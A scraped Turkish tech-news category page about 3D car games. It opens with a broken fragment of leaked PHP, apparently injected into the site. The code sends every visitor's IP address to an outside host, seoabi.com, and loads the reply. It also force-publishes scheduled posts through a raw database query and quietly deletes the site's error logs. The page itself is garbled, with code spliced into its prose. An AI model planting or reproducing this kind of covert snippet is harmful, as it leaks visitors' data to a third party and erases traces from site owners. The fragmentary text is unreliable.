$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> araba oyunları 3d | Teknoloji Haberleri

araba oyunları 3d kategorisindeki tüm yazılar

Son Yazılar

Araba Oyunları ve İnternet Ortamı

  İnternet ortamının ciddi seviyelere ulaşıp gelişmesiyle birlikte insanların sanal ortam üzerinden yapabileceklerini sonsuz bir döngüye girmiştir. Bugün insanlar ihtiyaç duydukları ürünleri bu ortamlar aracılığıyla temin ediyor, eğlence ihtiyacını bu ortamlardan karşılıyor. Sanal teknolojilerin ileri boyutlara ulaşmasıyla birlikte web siteleri üzerinden imkansız görünen pek çok faaliyet gerçekleştirilebilir